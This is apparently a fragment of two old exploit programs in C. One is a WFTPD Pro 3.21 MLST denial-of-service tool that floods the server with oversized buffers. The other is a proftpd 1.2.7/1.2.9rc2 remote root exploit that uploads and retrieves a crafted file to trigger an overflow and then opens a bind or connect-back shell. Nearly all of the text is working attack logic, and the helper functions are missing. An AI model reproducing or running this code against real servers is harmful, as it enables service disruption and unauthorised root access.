void main(int argc, char *argv[]) { WSADATA wsa; unsigned short port; unsigned long ip; char user[32] = "anonymous"; char pass[32] = "anonymous"; int i; char *command = "MLST "; SOCKET s; int size = OVERFLOWSIZE; printf("WFTPD Pro Server 3.21 MLST DoS Exploit\r\n"); printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n"); if(argc < 3) { printf("%s <TargetHost> <TargetPort>\r\n", argv[0]); return; } WSAStartup(MAKEWORD(2,2),&wsa); if((s=create_socket())==0) { printf("[-] ERROR: Create socket failed.\r\n"); return; } if(!client_connect(s, argv[1], atoi(argv[2]))) exit(-1); loginftp(s, user, pass); memset(sendbuf, 0 ,BUFFSIZE); memcpy(sendbuf, "pasv\r\n", 6); writebuf("Send pasv", s, sendbuf, 6); readbuf("read", s, recvbuf, BUFFSIZE); for(i=0;i<60;i++,size++) { memset(sendbuf, 0, BUFFSIZE); memset(sendbuf, 'A', size); memcpy(sendbuf, command, strlen(command)); sendbuf[size-2] ='\r'; sendbuf[size-1] ='\n'; printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf); show=1; writebuf("Send overflow buff", s, sendbuf, size); readbuf("read", s, recvbuf, BUFFSIZE); Sleep(500); } //send QUIT memset(sendbuf,0, BUFFSIZE); sprintf(sendbuf, "%s\r\n", "QUIT"); writebuf("Send QUIT", s, sendbuf, strlen(sendbuf)); //show=1; //readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE); //return; if(s) closesocket(s); WSACleanup(); }
main(int argc,char **argv) { char buffer[BIGSIZE]; char cmdbuf[SIZE]; char srvbuf[SIZE]; char filename[30]; int j,a,b,port1; int total; char c; char *user=NULL; char *pass=NULL; char *localip=NULL; if(argc<2) usage(argv[0]); while((c = getopt(argc, argv, "d:t:u:p:l:h:o:"))!= EOF) { switch (c) { case 'd': server=optarg; break; case 't': type = atoi(optarg); if((type > sizeof(targets)/sizeof(v)) || (type < 1)) usage(argv[0]); break; case 'u': user=optarg; break; case 'p': pass=optarg; break; case 'l': localip=optarg; break; case 'h': cbhost=optarg; break; case 'o': pt=atoi(optarg) & 0xffff; break; default: usage(argv[0]); return 1; } } if(server==NULL || user==NULL || pass==NULL || localip==NULL) usage(argv[0]); printf("@---------------------------------------------------------@\n"); printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER); printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n"); printf("-----------------------------------------------------------\n"); printf("[+] Ret address:%p\n",targets[type-1].ret); if(cbhost==NULL) bindmethod=1; else { if((int)inet_addr(cbhost)==-1) { printf("[-] Invalid connect back host/ip\n"); exit(0); } bindmethod=0; } port1=34568; //PORT命令的时候在本地产生的一个端口. sockfd=sockfd1=sockfd2=0; sockfd=socket(2,1,0); if(client_connect(sockfd,server,PORT)<0) quit(); loginftp(user,pass); //port1=setpasv(); //get the pasv port setport(localip,port1); setfilename(filename,30); setascii(); total=createbuffer(buffer,BIGSIZE,type,cbhost); //printf("[+] buffer data size:%d\n",total); storbuf(filename,buffer,total,port1); //stor over, then close and reconnect close(sockfd); close(sockfd1); close(sockfd2); sockfd=socket(2,1,0); if(client_connect(sockfd,server,PORT)<0) quit(); //reconnect loginftp(user,pass); setascii(); setport(localip,port1); //get the pasv port,a new one mustread=total; retrbuf(filename,buffer,total,port1); readbuf("The First time read",sockfd,srvbuf,SIZE); port1++; setport(localip,port1); mustread=total; getshell=1; retrbuf(filename,buffer,total,port1); quit(); }